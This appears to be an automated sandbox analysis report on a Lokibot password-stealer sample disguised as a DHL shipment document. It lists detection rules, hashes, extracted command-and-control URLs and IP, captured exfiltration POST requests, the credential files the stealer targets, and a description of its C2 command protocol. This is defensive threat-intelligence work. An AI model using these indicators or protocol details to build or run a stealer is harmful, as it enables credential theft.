Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL_Express_Shipment_DOC.exe

Overview

General Information

Sample Name:DHL_Express_Shipment_DOC.exe
Analysis ID:831160
MD5:370ebdf4ff5036c106793994cc851779
SHA1:cc04ea26c1364b9a058b55c8697a49e1c7e16970
SHA256:1ebedb652fa27423240c3efa860e7551958811120737ee5d3ea7badf671fbacf
Tags:exeLoki
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
          • 0x17936:$f1: FileZilla\recentservers.xml
          • 0x17976:$f2: FileZilla\sitemanager.xml
          • 0x15be6:$b2: Mozilla\Firefox\Profiles
          • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
          • 0x15afa:$s4: logins.json
          • 0x169a4:$s6: wand.dat
          • 0x15424:$a1: username_value
          • 0x15414:$a2: password_value
          • 0x15a5f:$a3: encryptedUsername
          • 0x15acc:$a3: encryptedUsername
          • 0x15a72:$a4: encryptedPassword
          • 0x15ae0:$a4: encryptedPassword
          00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          Click to see the 7 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
                • 0x17936:$f1: FileZilla\recentservers.xml
                • 0x17976:$f2: FileZilla\sitemanager.xml
                • 0x15be6:$b2: Mozilla\Firefox\Profiles
                • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                • 0x15afa:$s4: logins.json
                • 0x169a4:$s6: wand.dat
                • 0x15424:$a1: username_value
                • 0x15414:$a2: password_value
                • 0x15a5f:$a3: encryptedUsername
                • 0x15acc:$a3: encryptedUsername
                • 0x15a72:$a4: encryptedPassword
                • 0x15ae0:$a4: encryptedPassword
                3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                Click to see the 11 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:192.168.2.464.227.48.21249700802024313 03/21/23-07:13:25.127064
                SID:2024313
                Source Port:49700
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.464.227.48.21249698802021641 03/21/23-07:13:22.578656
                SID:2021641
                Source Port:49698
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.464.227.48.21249699802024318 03/21/23-07:13:23.800015
                SID:2024318
                Source Port:49699
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.464.227.48.21249698802024312 03/21/23-07:13:22.578656
                SID:2024312
                Source Port:49698
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.464.227.48.21249700802024318 03/21/23-07:13:25.127064
                SID:2024318
                Source Port:49700
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.464.227.48.21249699802021641 03/21/23-07:13:23.800015
                SID:2021641
                Source Port:49699
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.464.227.48.21249701802021641 03/21/23-07:13:27.165442
                SID:2021641
                Source Port:49701
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.464.227.48.21249701802024313 03/21/23-07:13:27.165442
                SID:2024313
                Source Port:49701
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.464.227.48.21249698802024317 03/21/23-07:13:22.578656
                SID:2024317
                Source Port:49698
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.464.227.48.21249701802024318 03/21/23-07:13:27.165442
                SID:2024318
                Source Port:49701
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.464.227.48.21249699802024313 03/21/23-07:13:23.800015
                SID:2024313
                Source Port:49699
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.464.227.48.21249697802024317 03/21/23-07:13:21.229954
                SID:2024317
                Source Port:49697
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.464.227.48.21249702802024313 03/21/23-07:13:28.916498
                SID:2024313
                Source Port:49702
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.464.227.48.21249702802021641 03/21/23-07:13:28.916498
                SID:2021641
                Source Port:49702
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.464.227.48.21249702802024318 03/21/23-07:13:28.916498
                SID:2024318
                Source Port:49702
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.464.227.48.21249697802021641 03/21/23-07:13:21.229954
                SID:2021641
                Source Port:49697
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.464.227.48.21249700802021641 03/21/23-07:13:25.127064
                SID:2021641
                Source Port:49700
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.464.227.48.21249697802024312 03/21/23-07:13:21.229954
                SID:2024312
                Source Port:49697
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: DHL_Express_Shipment_DOC.exeReversingLabs: Detection: 18%
                Source: DHL_Express_Shipment_DOC.exeVirustotal: Detection: 30%Perma Link
                Machine Learning detection for sample
                Source: DHL_Express_Shipment_DOC.exeJoe Sandbox ML: detected
                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
                Source: DHL_Express_Shipment_DOC.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: DHL_Express_Shipment_DOC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: xqcD.pdb source: DHL_Express_Shipment_DOC.exe
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,3_2_00403D74

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49697 -> 64.227.48.212:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49697 -> 64.227.48.212:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49697 -> 64.227.48.212:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49698 -> 64.227.48.212:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49698 -> 64.227.48.212:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49698 -> 64.227.48.212:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49699 -> 64.227.48.212:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49699 -> 64.227.48.212:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49699 -> 64.227.48.212:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49700 -> 64.227.48.212:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49700 -> 64.227.48.212:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49700 -> 64.227.48.212:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49701 -> 64.227.48.212:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49701 -> 64.227.48.212:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49701 -> 64.227.48.212:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49702 -> 64.227.48.212:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49702 -> 64.227.48.212:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49702 -> 64.227.48.212:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                Source: Joe Sandbox ViewIP Address: 64.227.48.212 64.227.48.212
                Source: global trafficHTTP traffic detected: POST /?page_id=215360 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 64.227.48.212Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F9D8E6AContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /?page_id=215360 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 64.227.48.212Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F9D8E6AContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /?page_id=215360 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 64.227.48.212Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F9D8E6AContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /?page_id=215360 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 64.227.48.212Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F9D8E6AContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /?page_id=215360 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 64.227.48.212Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F9D8E6AContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /?page_id=215360 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 64.227.48.212Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F9D8E6AContent-Length: 163Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: unknownTCP traffic detected without corresponding DNS query: 64.227.48.212
                Source: DHL_Express_Shipment_DOC.exe, 00000003.00000002.486703959.0000000001678000.00000004.00000020.00020000.00000000.sdmp, DHL_Express_Shipment_DOC.exe, 00000003.00000002.486364234.000000000049F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://64.227.48.212/?page_id=215360
                Source: DHL_Express_Shipment_DOC.exe, 00000003.00000002.486703959.0000000001678000.00000004.00000020.00020000.00000000.sdmp, DHL_Express_Shipment_DOC.exe, 00000003.00000002.487142894.0000000003519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://robertmario.is/?feed=comments-rss2
                Source: DHL_Express_Shipment_DOC.exe, 00000003.00000002.486703959.0000000001678000.00000004.00000020.00020000.00000000.sdmp, DHL_Express_Shipment_DOC.exe, 00000003.00000002.487142894.0000000003519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://robertmario.is/?feed=rss2
                Source: DHL_Express_Shipment_DOC.exe, 00000003.00000002.486703959.0000000001678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://robertmario.is/index.php?rest_route=/
                Source: DHL_Express_Shipment_DOC.exe, DHL_Express_Shipment_DOC.exe, 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: DHL_Express_Shipment_DOC.exe, 00000003.00000002.486703959.0000000001678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
                Source: unknownHTTP traffic detected: POST /?page_id=215360 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 64.227.48.212Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F9D8E6AContent-Length: 190Connection: close
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeCode function: 3_2_00404ED4 recv,3_2_00404ED4

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: DHL_Express_Shipment_DOC.exe PID: 5364, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: DHL_Express_Shipment_DOC.exe
                Source: DHL_Express_Shipment_DOC.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
